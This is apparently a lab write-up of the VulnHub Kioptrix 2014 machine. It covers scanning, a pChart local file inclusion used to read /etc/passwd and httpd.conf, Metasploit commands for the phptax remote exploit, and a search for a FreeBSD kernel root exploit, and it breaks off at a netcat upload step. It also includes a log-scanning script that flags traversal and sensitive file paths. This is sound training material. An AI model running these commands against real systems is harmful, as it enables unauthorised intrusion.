Vulnhub Write-up Kioptrix 2014 (#5)
This is a write-up of the Kioptrix machine from VulnHub.
DIGEST
Kioptrix is based on FreeBSD 9.0. A phptax vulnerability gives us the initial shell, and the SYSRET kernel exploit gets us root.
Machine Author: Kioptrix
Machine Type: FreeBSD 9.0
Know-How
- Nmap
- Searchsploit
- Metasploit
Absorb Skills
- pChart 2.1.3 exploit
- phptax exploit
- SYSRET kernel exploit (CVE-2012-0217)
Scanning the Network
$nmap -sC -sV 192.168.0.130


There are two ports open, 80 and 8080. Port 8080 returns Forbidden, and port 80 displays the “It works” message.


The page source on port 80 gives us a hint to a URL.

Exploiting the Server

There is a pChart application. Running searchsploit against its version turns up multiple vulnerabilities.
$searchsploit pchart 2.1.3

Copy the exploit into the current working directory and read it.
$searchsploit -m exploits/php/webapps/31173.txt
$cat 31173.txt

The LFI works, so let's try to grab the /etc/passwd file.
Note down the OS version; it may help with privilege escalation.

Let's grab the httpd.conf file, which stores the server configuration.
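A defender-side check for the LFI requests described above, as an added example that is not part of the original write-up: it scans web access log lines for query parameters that decode to directory traversal or to the files read here (/etc/passwd, httpd.conf). The log lines are constructed, and the /app/view.php path and the file parameter are hypothetical placeholders, not pChart's actual endpoint.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Files this write-up reads through the LFI; extend the tuple for your hosts.
SENSITIVE = ("etc/passwd", "httpd.conf")
# Request field of a common/combined-format access log: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines; /app/view.php and "file" are hypothetical names.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 152',
    '192.0.2.10 - - [01/Jan/2020:10:00:05 +0000] "GET /app/view.php?file=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1843',
    '192.0.2.10 - - [01/Jan/2020:10:00:09 +0000] "GET /app/view.php?file=..%252f..%252fconf%252fhttpd.conf HTTP/1.1" 200 9120',
    '192.0.2.11 - - [01/Jan/2020:10:01:00 +0000] "GET /app/view.php?file=report.php HTTP/1.1" 200 640',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252f) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def lfi_findings(log_line):
    """Return (parameter, reason) pairs for suspicious query values in one line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group("target")).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw).replace("\\", "/").lower()
        if "../" in value or value.endswith("/.."):
            findings.append((name, "directory traversal"))
        if any(path in value for path in SENSITIVE):
            findings.append((name, "sensitive file path"))
    return findings


if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, start=1):
        for name, reason in lfi_findings(line):
            print(f"line {number}: parameter {name!r}: {reason}")
```

A 200 response on a flagged line is the signal to prioritise, since it suggests the file was actually returned rather than the request being rejected.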


During the initial recon, port 8080 was not accessible. Let's look for the reason in the httpd.conf file.

To access port 8080, the User-Agent must be Mozilla/4.0 Mozilla4_browser.

Port 8080 has a phptax application running. Let's use searchsploit to find any vulnerability present in the application.

$searchsploit phptax

OWN WWW
$msfconsole
msf5 > search phptax
msf5 > use exploit/multi/http/phptax_exec
msf5 exploit(multi/http/phptax_exec) > set RHOSTS 192.168.0.130
msf5 exploit(multi/http/phptax_exec) > set RPORT 8080
msf5 exploit(multi/http/phptax_exec) > exploit


OWN ROOT
During the initial recon, we found that the FreeBSD version is 9. Let's see if there is a kernel-level exploit that will help us gain root.
$searchsploit FreeBSD 9.0

Let's move the exploit to the machine. Neither wget nor curl is installed on it, so I am using Netcat to upload the file.




